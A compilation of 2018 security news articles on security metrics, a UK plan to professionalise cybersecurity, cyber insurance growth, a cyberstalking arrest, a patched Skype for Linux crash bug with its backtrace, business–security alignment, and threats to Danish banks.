“Two that we really like to include,” said Miessler, “are firstly, the amount of risk visibility present in the organization (percentage of systems under security management). That is, don’t just report on what you can see, but what percentage of risk isn’t yet visible to you because of technological and time limitations. Secondly, the percentage of systems under management that have x, y, and z level of defenses implemented. These are quite different, as you can have great numbers for the latter while having bad numbers for the former, and risk will still be very high.”

Kellermann proposes “three grades of measurement which are encompassed in the level of risk posed to the information supply chain and operations for a company. These begin with the results from hunt teams to discern if there is a current compromise and what is the scale? Second how quickly can that cybercrime be suppressed and contained? Lastly, are we compliant with the security standards mandated in our industry and our geography. If not, why?”

Like Sahai, Paunet believes the different metrics should be brought together to show the overall security posture of the organization. “It's also helpful to show how the threat landscape and an organization's response is changing over time. This gives the executive team, who may not be cybersecurity experts, some insight into why security is business-critical and worthy of continued investment. CISOs need to distill security insights into something that can be consumed by a non-technical audience that is more interested in the ‘why’ than the ‘what’.”

Meeuwisse warns against being totally insular. “What technology and threat changes are being anticipated or experienced elsewhere in your industry? A dashboard about emerging threats is a great way to check if everything appears to be in hand and if anything needs to be added for consideration.”

But in the final analysis, as Chris Key succinctly says, “The best metrics demonstrate how effective the cybersecurity program is at achieving key business objectives.”

The key takeaways

What is clear from these discussions is that there is no simple answer to what makes good infosec metrics for reporting to business leadership. The detail will vary from industry sector to industry sector, and even company to company, depending on the key business drivers.

It is equally clear infosec must understand business. CISOs cannot expect business leaders to understand security. The purpose of the metrics is to explain how security supports, or could further support, business priorities. To do this, CISOs must understand those business priorities.

The problem here is that such understanding comes best from being a part of the overall business leadership – which rarely happens. In a few enlightened cases, CISOs have at least a voice at the board; but in most cases they still report to the CIO who will have his or her own priorities sometimes at odds with the CISO’s priorities.

Cracking the metrics nut is important. The prize is high – nothing less than more efficient security, a more profitable business, a greater likelihood of gaining budget when it is required, and greater personal visibility at board level. When security is seen to provide protection at the right level and in the important places, it genuinely becomes the enabler of safe business and increased profits rather than a simple drain on corporate funds.

Without good metrics, security and business alignment is unlikely. And without that alignment, security will be patchy and business at risk.


Professionalizing Cybersecurity Practitioners
10.9.2018 securityweek
Cyber

The formation of a professional body to provide standards of excellence within cybersecurity practitioners has been mooted for many years. Now the UK government has proposed the development of an institution for “developing the cybersecurity profession, including through achieving Royal Chartered status by 2020.”

This is the professionalization of cybersecurity in everything but name. ‘Regulation’ is not mentioned in the proposal; but just as the General Medical Council regulates medical practitioners, so a potential UK National Cybersecurity Council might eventually regulate cybersecurity practitioners.

This could include setting and requiring cybersecurity qualifications and setting the level of qualifications needed in specific industries. While this will inevitably raise the technical level of many cybersecurity practitioners, it could potentially mean that some practitioners could not be employed by some – if not all – companies without attaining a predefined level of qualifications.

This is not yet the inevitable outcome of the government proposals, which are outlined in a consultation document titled, Developing the Cyber Security Profession in the UK (PDF). The consultation closed August 31, 2018, and the government is currently analyzing feedback.

The proposal

The proposal is that the cybersecurity profession delivers on four specific themes by 2021. These are professional development, professional ethics, thought leadership and influence, and outreach and diversity. Each of these themes is discussed and followed by one or more relevant consultation questions.

Underpinning the proposed role of the National Cybersecurity Council is the CyBOK project – the development of a Cybersecurity Body of Knowledge – being led by Professor Awais Rashid at the University of Bristol. The overall aim of the CyBOK project is to codify the foundational and generally recognized knowledge in cybersecurity.

This project is ongoing. The first phase, completed in October 2017, defines 19 knowledge areas (KAs) of cybersecurity. The government proposal says, “The depiction of the 19 Knowledge Areas sets the scope of cybersecurity to shape approaches for training, standard setting, the dissemination of expert opinion, and the execution of professionalism.”

The 19 KAs of the CyBOK

There is much that is good in the proposals. For example, the government expects to support the development of the professional body, but to then step aside so that it is “fully independent of government.”

However, there is also much that can be criticized. Firstly, it is not a discussion document on what should be done, but one on how to achieve what has already been decided – that is, the formation of a National Cybersecurity Council.

Perhaps even more concerning, however, is that the Council is to be derived from existing organizations rather than individuals. “We envisage,” says the proposal, “the Council would have organizational rather than individual membership and be made up of existing professional bodies and other organizations with an interest in cybersecurity.”

While nobody will deny the great work already undertaken by many of these existing organizations, the fact remains that they are basically businesses that have sometimes been described as primarily designed to sell certificates.

The lack of direct representation by the very people that are meant to be represented – the individual cybersecurity professionals – could be a worrying development.

Support from existing professional bodies

Existing professional cybersecurity organizations have expressed strong support and have banded together to form an ‘Alliance’ in support of the government’s proposals. The Alliance membership currently comprises BCS, The Chartered Institute for IT, Chartered Institute of Personnel & Development (CIPD), the Chartered Society of Forensic Sciences (CSofFS), CREST, The Engineering Council, IAAC, The Institution of Analysts and Programmers (IAP), The IET, Institute of Information Security Professionals (IISP), Institute of Measurement and Control (InstMC), ISACA, (ISC)2, techUK, The Security Institute, and WCIT, The Worshipful Company of Information Technologists.

A typical expression of support includes, from Deshini Newman, MD EMEA (ISC)2, “We are reaching an important milestone in the maturity of our profession with the intent to develop a nationally-recognized professional body and consideration for chartered status. The UK is taking a leadership role in this effort that may well set an example for governments around the world. We are keen to support their work.”

Michael Hughes, board director of ISACA, adds, “We believe objectives such as the prioritization of benchmarking cyber capabilities and a sharper focus on the need to fortify the pipeline of highly skilled, well-trained cybersecurity professionals put the alliance on track to serve as a valuable resource in support of the UK National Cyber Security Strategy.”

The Chair of the IISP, Dr. Alastair MacWillson, told SecurityWeek, “The IISP has been involved in this initiative from the outset… These discussions have led to the DCMS launching last [July’s] consultation to create a new UK Cyber Security Council to develop the cybersecurity profession in the UK… What is being proposed by the Government through this initiative, is the most profound development of governance for the information security profession that we have seen.”

It is no surprise that existing professional bodies will support the government approach to professionalization – those that don’t will lose ground to those that do. But nowhere in this proposal, or in the support for it, is the voice of the practitioners.

Views from the coalface

The opinions of existing cybersecurity practitioners and individual security consultants range from support through ‘a good but unworkable idea’ to reserved condemnation.

Martin Zinaich, information security officer at the City of Tampa, Florida, has long advocated the formation of a professional body for cybersecurity practitioners able to uphold and maintain professional standards. He wrote a paper on the subject and sees similarities in the UK proposal to his own ideas.

He believes that professionalization is not merely a good idea, but an essential step towards improving the overall quality of cybersecurity. He has some concerns over the involvement of government. He believes a light touch – as suggested in the government proposal – is feasible; but probably not likely. He has always held the view that professionalization is ultimately inevitable, and that if practitioners don’t do it themselves, governments will do it to them.

“The idea,” he told SecurityWeek, “that such critical ubiquitous lifeblood like technology, the internet and IoT will not be regulated heavily, as each new breach expands its impact, is very short sighted. We either lead this effort or get led.”

The concept of a professional body promoting expertise is widely welcomed; but government involvement is sometimes questioned. “In principle, I think it’s a good idea,” says Paul Simmonds, CEO at The Global Identity Foundation; co-founder of the Jericho Forum. “In fact, when I supported the setting up of the IISP over 10 years ago that's what I hoped they were going to be.”

But he has his own concerns: “Unlike many other professional bodies, security moves an order of magnitude faster, so the worry is that the ‘grandees’ who define the bar for qualification cannot keep up with the speed of change – and we thus continue to implement 1990s-based perimeterized networks.”

Raef Meeuwisse, author of Cybersecurity for Beginners, believes the proposal is a bad idea. “Existing cybersecurity professionals will look at any additional overhead or demands imposed by any national training standards and think; not this. They will vote with their feet and move their skills on to more savvy international employers.”

Meeuwisse believes that top talent rarely bothers with certifications, “not only because their talent speaks for itself but more importantly because training and certification content often lags behind the operational reality by a number of years.”

He fears that rather than levelling cybersecurity professionalism up, a National Cyber Security Council will level down by driving the most able people out of the UK. “Any national registration or requirements,” he told SecurityWeek, “would just act as a deterrent to the best cybersecurity professionals taking up roles in the UK, because the success of the best cybersecurity professionals is built around having a global and international focus.” Rather than solving the cybersecurity problem within the UK, he fears that a national council will simply make it worse.

Meeuwisse is not alone in questioning the absolute need for certifications. Steven Lentz, CSO and director of information security at Samsung Research America, makes a similar point. “There are a lot of security practitioners that do not have security certifications or memberships; but does that mean they do not know their field? They may have been practicing for 10+ years but never had the time to certify. Membership and certification qualities are helpful but depending on the job, job experience is the key.”

Such professionals are well-aware of the existing problems within their industry. One expert, preferring to remain anonymous because he is an ‘official’ in one of the Alliance member organizations, explained, “There are serious problems that remain in the cybersecurity field today, which have existed for a long time. These problems relate to inadequate level of knowledge in security practitioners, lack of measurement performed on activities, and methodologies, poor judgement and decision making in risk management, insufficient communication at many different levels within and between organizations, limited business alignment and limited security assurance provided to stakeholders.”

He believes establishing a cybersecurity profession can help with this, but he has some worries. “The nature of the work we do in managing information risk is very broad, covering disciplines as diverse as strategy, architecture, software development, operations, supply chain risk, incident management, business continuity and assurance. A profession should cover these and other disciplines/practices. Restricting the scope to cybersecurity will likely be too narrow.”

He sees CyBOK itself as problematic. “We need a strong, comprehensive and balanced framework on which to build the profession. I think the contents of the CyBOK, as it currently stands, is problematic for two reasons. Firstly, why would you include capabilities like governance, law, regulation and privacy when they are already covered elsewhere? And secondly, why would you exclude coverage of essential disciplines like psychology, economics, decision theory, social science and statistics, when they are so important to effective cybersecurity?”

The idea that a formal professional body for cybersecurity professionals is a positive and welcome step – but that it has problems – is common. Independent security consultant Stewart Twynham acknowledges that there must be change. “Look at any job ad for a ‘cybersecurity professional’ and you’ll see a long list of must-have training and certifications costing anywhere from £5,000 to £25,000 – along with experience pre-requisites that rule out most candidates. Something has to change… but at the same time we must also be mindful of the rule of unintended consequences.”

He points to the 1986 NHS Project 2000 that was designed to turn nursing into a professional career. “Thirty-two years on and the NHS now faces one of the greatest recruitment crises in its 70-year history amid concerns that nurses are now academics, taught by academics and are no longer bringing the softer skills into hospitals that the role so desperately requires.”

David Ginsburg, VP of marketing at Cavirin, comments, “The concept of security as an accredited profession is a noble concept. However, it should not be at the risk of interfering with the free market or making it overly difficult for new entrants due to entrenched professional bodies.”

He suggests that the U.S. concept of the ‘professional engineer’ could provide a useful blueprint. “A compromise could be the equivalent of the professional engineer (PE) in the U.S., where individuals are not precluded from utilizing the latest technologies and approaches. In California, we have PEs as diverse as electrical, nuclear, traffic, and chemical; and I could easily see cybersecurity added to the list.”

While most practitioners seem to feel that a professional body is a good idea but with problems and difficulties, there are others more strongly in favor. “Personally, I think it’s a good thing,” Steve Furnell, associate dean and professor of IT security at Plymouth University, told SecurityWeek: “not least because it underlines cybersecurity as being a profession and thereby meriting consideration in its own right, as opposed to being viewed as part of IT, and implying that any qualified IT practitioner might also be suitable to have a stab at security.”

He doesn’t believe it has to be ‘membership by qualification’, but rather by evidence of skills and capability. “Qualifications and certifications are means by which some aspects might be demonstrated,” he continued, “but practitioner experience should count towards the level that can be achieved. Businesses looking to employ staff would, of course, be well-advised to employ people with the right skills, and holding membership of the professional body could prove to be a means of demonstrating this.”

Randy Potts, an information security leader in the Dallas, Texas area, also supports the idea. “At this point, we need all the help we can get, and another council/organization/body might have more success. I do not see this as the final answer, but the new council seems at least focused on clarifying qualifications and career paths, which will aid those looking to enter,” he told SecurityWeek.

“SANS and US government bodies work together on frameworks regularly. I was a fan of the Australian DoD Top 35 too,” he continued. “This seems to be the furtherance of such initiatives. The government working with outside parties is a good way to get multiple perspectives. I think of all the great talent being produced by the Israeli Defense Forces and the startup activity in Tel Aviv as a result.”


The idea of a professional body to raise and maintain cybersecurity standards is good – but there are many concerns over how it may be implemented.

While individual practitioners could voice their opinions during the consultation period of August 2018, they are precluded from being a part of the National Cyber Security Council itself. This implies that the Council will operate as a controlling organization rather than a forum for practitioners.

There is some concern that the existing General Medical Council (GMC) may be the blueprint for the National Cyber Security Council. Qualified medical doctors must be registered with the GMC before they can practice – and there are many examples of doctors being ‘struck off’ for voicing the wrong opinions.

If the GMC is the blueprint, there are also concerns that security product vendors may come to wield too much influence over the GSC, just as there are current concerns that the pharmaceutical companies influence the GMC.

“Influence from drug companies is a problem in the [medical practitioner] space,” is one comment received. “How much of a risk I don’t know but I’ve learnt a lot from Ben Goldacre. For cybersecurity this is a similar risk and will need to be acknowledged and managed.” (Ben Goldacre is author of Bad Pharma: How Drug Companies Mislead Doctors and Harm Patients.)

There is a question over whether the government will be able to fully step aside and leave an established National Cyber Security Council as a fully independent body. Will the government ever be able to let go of control? “No,” says Steven Lentz. “The government thinks it knows all but actually is behind the times in my opinion. Too much politics to really help. The government can maybe have an advisory role but should not run anything.”

“I don't know if government does need to let go,” counters Randy Potts. “If this is effective and successful then I see the government not wanting to let go. If the initiative is a failure, the whole initiative will likely fade away or perhaps never take off.”

The devil will be in the detail going forward. Done correctly, a professional body will benefit the nation, its businesses, and the practitioners. Done badly, it could prove an unmitigated disaster.

“I do think the benefit of an information risk management profession (i.e. beyond just cybersecurity) outweighs the risk, although it will need to be managed. It could even be an opportunity to show how an emerging profession can lead the way and act as a role model for other professions. Is this idealistic? Probably.”

There is one final question worth asking. If the formation of an overarching professional body is such an attractive concept that all the existing professional organizations (the ‘Alliance’) offer such strong support – why did they not come together of their own accord without first requiring the intervention of government?


Cyber Insurance Market to Double by 2020, Says Munich Re
10.9.2018 securityweek Cyber

The market for insurance against cyber threats will double by 2020 to over 8 billion dollars, German reinsurance giant Munich Re told a conference in Monaco on Sunday.

"Cyber risks are one of the biggest threats to the networked economy," Munich Re board member Torsten Jeworrek said in a statement on the first day of an annual meeting of reinsurers in the Mediterranean principality.

Munich Re estimated that companies could more than double their spending on cyber insurance from $3.4-$4 billion (3-3.4 billion euros) in 2017 to $8-$9 billion by 2020.

While the digital economy had increased productivity, "increased networking of machines, and equipment in particular, can also give rise to very complex risks such as data theft, disruptions in the interaction between networked machines, and even the failure of entire production lines and supply chains," Munich Re said, estimating the number of connected devices worldwide will rise from 27 billion to 125 billion by 2030.

"The economic costs of large-scale cyber attacks already exceed losses caused by natural disasters. Where small and medium-sized enterprises are affected, such attacks can soon threaten their very existence," Munich Re warned.

The most damaging attacks to date, in economic terms, have been caused by malware such as WannaCry and NotPetya, which infected hundreds of thousands of computers around the world in 2017.

The malware encrypted data on hard drives, demanding that users pay ransoms to regain access to the system.

"This trend will continue as more and more machines and devices are connected," Munich Re warned.


Man Charged With Cyberstalking Women for Explicit Photos
6.9.2018 securityweek Cyber

LOS ANGELES (AP) — A former NASA contractor who allegedly threatened to publish nude photos of seven women unless they sent him other explicit pictures has been arrested at his Los Angeles home.

Richard Bauer was arrested Wednesday.

Prosecutors say Bauer contacted some victims through Facebook and got them to reveal information he could use to reset their online passwords. He allegedly got other victims to install computer malware that allowed him to obtain email and website passwords.

Bauer allegedly threatened to post nude photos he'd obtained of the victims online unless they sent more photos.

He's facing 14 federal charges of stalking, unauthorized computer access and identity theft, which carry a possible 64-year sentence.

Bauer worked at NASA's Armstrong Flight Research Center in Southern California.

It's unclear if he has a lawyer.


An untold story of a memory corruption bug in Skype
6.9.2018 securityaffairs Cyber

A security expert discovered that Skype has a malloc(): memory corruption vulnerability that could be triggered while users share media or files with someone during a call.
Tested on: Linux zero 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux (Ubuntu 18.04 LTS)
Product affected: Skype for Linux (skypeforlinux_8.27.0.85_amd64.deb)

Steps to reproduce this issue:
1. Open Skype
2. Call anyone
3. During the call, try sharing media or files with the same person
4. Skype crashes.

While on a call with one of my colleagues, I tried sharing a file, which froze my Skype, and then it crashed. Moving further, I tried to debug it with `gdb` and this is what I got.

$ *** Error in `/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896': malloc(): memory corruption: 0x000000000641ff80 ***
======= Backtrace: =========
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fb57d6b97e5]
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7fb57d6c413e]
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fb57d6c6184]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(malloc+0x1c)[0x47cc34c]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_malloc+0x19)[0x7fb57ff91719]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x8508d)[0x7fb57ffc708d]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_variant_get_data+0x1f)[0x7fb57ffc72ff]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_variant_get+0xda)[0x7fb57ffc610a]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0xc873)[0x7fb57314b873]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0x10f2e)[0x7fb57314ff2e]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0x11dcb)[0x7fb573150dcb]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x15ad8)[0x7fb5824c3ad8]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new+0x104)[0x7fb5824c5534]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgio-2.0.so.0(g_volume_monitor_get+0x7c)[0x7fb582798ebc]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x25c3d5)[0x7fb583ba53d5]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11a75a)[0x7fb583a6375a]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11ce73)[0x7fb583a65e73]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x4d5a3)[0x7fb57ff8f5a3]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_markup_parse_context_parse+0xfc3)[0x7fb57ff90763]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d8d6)[0x7fb583a668d6]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_builder_extend_with_template+0x1a8)[0x7fb583a61b78]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_widget_init_template+0x107)[0x7fb583cabe07]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x1ae4f1)[0x7fb583af74f1]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11a75a)[0x7fb583a6375a]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11bb65)[0x7fb583a64b65]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d4f1)[0x7fb583a664f1]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x4d6d7)[0x7fb57ff8f6d7]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_markup_parse_context_parse+0xd8e)[0x7fb57ff9052e]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d8d6)[0x7fb583a668d6]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_builder_extend_with_template+0x1a8)[0x7fb583a61b78]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_widget_init_template+0x107)[0x7fb583cabe07]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x1a773e)[0x7fb583af073e]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new_valist+0x3b5)[0x7fb5824c51b5]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new+0xf1)[0x7fb5824c5521]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_file_chooser_dialog_new+0x74)[0x7fb583af1294]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x4e3b90b]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN11file_dialog14ShowOpenDialogERKNS_14DialogSettingsERKN4base8CallbackIFvbRKSt6vectorINS3_8FilePathESaIS6_EEELNS3_8internal8CopyModeE1ELNSC_10RepeatModeE1EEE+0x2d)[0x4e3be3d]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN4atom15WebDialogHelper14RunFileChooserEPN7content15RenderFrameHostERKNS1_17FileChooserParamsE+0x33c)[0x4e4d90c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c9b4]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c858]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d86c2f]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x2347525]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x48001eb]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ed9db]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47edcf8]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ee0d1]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47c4159]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47affc0]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfef9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfed9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d65ead]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1e67b93]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1a4c63c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x19e6d0d]
$
Cool, so when I read the backtrace, I understood that this might be a memory corruption in `malloc()`.

So basically, the memory allocator allocates pages of memory at once for use by programs, and it gives you a pointer within them. The files I am trying to share may be too large for Skype to handle during the call (PS: I was just sharing a JPG file in this case, which was 800 kB). If a larger program allocates larger amounts of memory and writes past the end of its allocated space, it ends up attempting to write into unallocated memory, which may cause memory corruption.

Being a fan of responsible disclosure, I submitted this to Microsoft on 8 August 2018, but MS says “Upon investigation, we have determined that this submission does not meet the bar for security servicing” 🤦

Okay, but I passed on this message to the Skype team on Twitter, and they looked into this!

At last, this was patched on Skype version 8.29.0.41 on Linux.


The Continuing Problem of Aligning Cybersecurity With Business
4.9.2018 securityweek  Cyber

Aligning security policy with business practices is generally considered to be a key imperative for a successful company. This must necessarily start with security teams understanding the business, and business leaders understanding security requirements.

Varonis decided to test the progress by querying 345 C-Suite executives and IT/cybersecurity professionals -- broadly separated into business and IT/security groups -- across the U.S., UK, France and Germany. The results show apparent progress, but with puzzling details that might indicate slightly divergent viewpoints between the two groups.

For example, asked what types of data most need to be protected, both groups agreed on first customer or patient data, and second, intellectual property. They disagreed however, on the third priority. The business group specified employee data, while the security group specified financial data.

However, the most surprising divergence comes in the response to a query on the business impact of a data breach. The security group were most concerned about loss of brand image for the business, while the business group were most concerned with the cost of recovery.

"If I had been asked before the survey," Brian Vecci, technical evangelist at Varonis, told SecurityWeek, "I would have thought that non-IT folks would have been more concerned about brand image and damage than with IT recovery costs -- but it's actually the other way around. It's the security experts that are most concerned with brand perception and intellectual property loss, whereas the non-IT C-suite execs -- the top business leaders -- tend to think that IT recovery costs are the biggest issues."

The figures suggest that business and IT/sec are still not fully aligned, but in a non-intuitive manner. The reason could be something simple. Business leaders understand business better than they understand cybersecurity, and consequently worry more about what they don't fully understand; while IT/sec people understand security better than they understand commerce.

Or it could be a continuing failure for IT/sec to find the best metrics for reporting to business leaders. "It's all about data," said Vecci. "Nobody ever breaks into a network to steal the network log -- it's all about data, either exfiltrating and stealing data, or in denying service with something like ransomware."

IT/sec is aware of the scale of the data issue, while business leaders are only just becoming aware. "We're living in a more dangerous interconnected world, where anybody, anywhere can -- and if they want to, probably will -- get into your network," continued Vecci. "And the scale of the problems they have to solve when it comes to data is far bigger than it used to be. Most companies have between 30% and 50% more data this year than they had last year, and it's not slowing down -- it's just the way things work."

The data that needs to be secured is also changing in its nature. A few years ago, most sensitive data was stored in structured databases, and the need and methodologies for securing that data were well understood. Now, however, the majority of sensitive data -- made more sensitive by increasingly stringent data privacy laws like the GDPR -- is held in unstructured files and documents. Earlier this year, the 2018 Varonis Global Data Risk Report showed that 41% of companies have more than 1,000 sensitive files open to everyone with access to the network, and 58% of companies have more than 100,000 folders open to everyone.

IT and security teams need increasing budgets to solve the increasing problems -- so their reporting tends to reflect the problems. They, however, are less concerned because they can see the improvements to their security posture; and the Varonis figures confirm this. Ninety-one percent of the IT/sec group believe their organization is making progress in security, while only 69% of the business leaders see that progress.

"The arrival of machine learning technologies has helped CISOs believe they are moving the needle and improving security," suggests Vecci. "They can see this, while business execs, who tend to have a more binary view of things, possibly cannot see it."

The misalignment between IT/sec and business leaders may, then, be down to the difficulty of delivering meaningful metrics on the effect of machine learning defenses. This is possibly confirmed by one of the responses in the Varonis survey. Asked whether the organization can quantify the effect of cybersecurity measures, 88% of the IT/sec group replied in the affirmative, while only 68% of the business group agreed.

Unfortunately, while this may be partially true, other figures from the Varonis survey suggest that there remains a fundamental divide between the two sides. Ninety-six per cent of the IT/sec group believes their security planning approach is aligned with the organization's risks and objectives, but only 73% of the business leaders agree.

Perhaps the most concerning response came from the question on whether business is actually listening to IT/sec. Asked whether the leadership acts on input/guidance from the IT/sec team, 94% of the IT/sec team agreed, while only 76% of the business group agreed.

This Varonis survey shows that a fundamental misalignment still exists between business and IT/sec -- but not always in the most obvious manner. It could possibly be because business leaders still do not understand cybersecurity and simply turn a deaf ear to demands for more budget; or it could be the continuing inability of the IT/sec team to find the right metrics that can be understood by business people. This could in turn be down to the speed of technological changes. IT/sec is introducing new technologies like machine learning at a faster rate than they can provide metrics on the performance of those technologies.


The cyber threat against Danish financial sector is very high
4.9.2018 securityaffairs Cyber

A report published by the Centre for Cyber Security (Center for Cybersikkerhed) states that the threat to the Danish financial sector is very high.
According to a report by the Centre for Cyber Security (Center for Cybersikkerhed), a department of military security agency FET (Forsvarets Efterretningstjeneste), the cyber threat against the Danish financial sector is very high.

The centre monitors the attacks against Denmark and Danish businesses.

“The threat posed to the Danish financial sector by cyber crime is very high,” reads the report published by the centre.

The threat is “becoming increasingly advanced and complex, and cyber attacks can disrupt the access to Danish financial sector services,” the report adds.

The centre warns of a specific threat with “capacity, intention, planning and possible implementation. Attack/damaging activity is very likely.”

The government experts believe that cyber espionage represents one of the main threats to the country and its businesses.

Digital espionage is also considered to be a high area of risk, according to the report.

“It is likely that foreign states have both political and economic interest in conducting cyber espionage against the Danish financial sector,” continues the report.

It is interesting to note that the Government centre classifies the threat of cyber terrorism to the financial industry as low.

“But the report also found only a low threat of cyber terror, in which cyber attacks would aim to completely bring down financial systems in Denmark,” states The Local news agency.

“Finans Danmark, a representative organisation for the financial sector, said it recognised the level of cyber threat described by the agency report.”


Cybercriminal organizations focused on banks are intensifying their actions and their operations are becoming even more sophisticated. In the last years, security experts have monitored the activities of several threat actors specialized in attacks aimed at the financial sector and their customers.

“As the systems at banks become stronger, so too do the methods used by cyber criminals become more advanced, and that requires us to constantly keep up,” Finans Danmark director of digitalisation Michael Busk-Jepsen wrote in a press statement.

“There is no doubt that crime aimed at banks and bank customers via the internet is growing,” Busk-Jepsen added.


Iranian Hackers Target Universities in Large Attack Campaign: SecureWorks
29.8.2018 securityweek Cyber

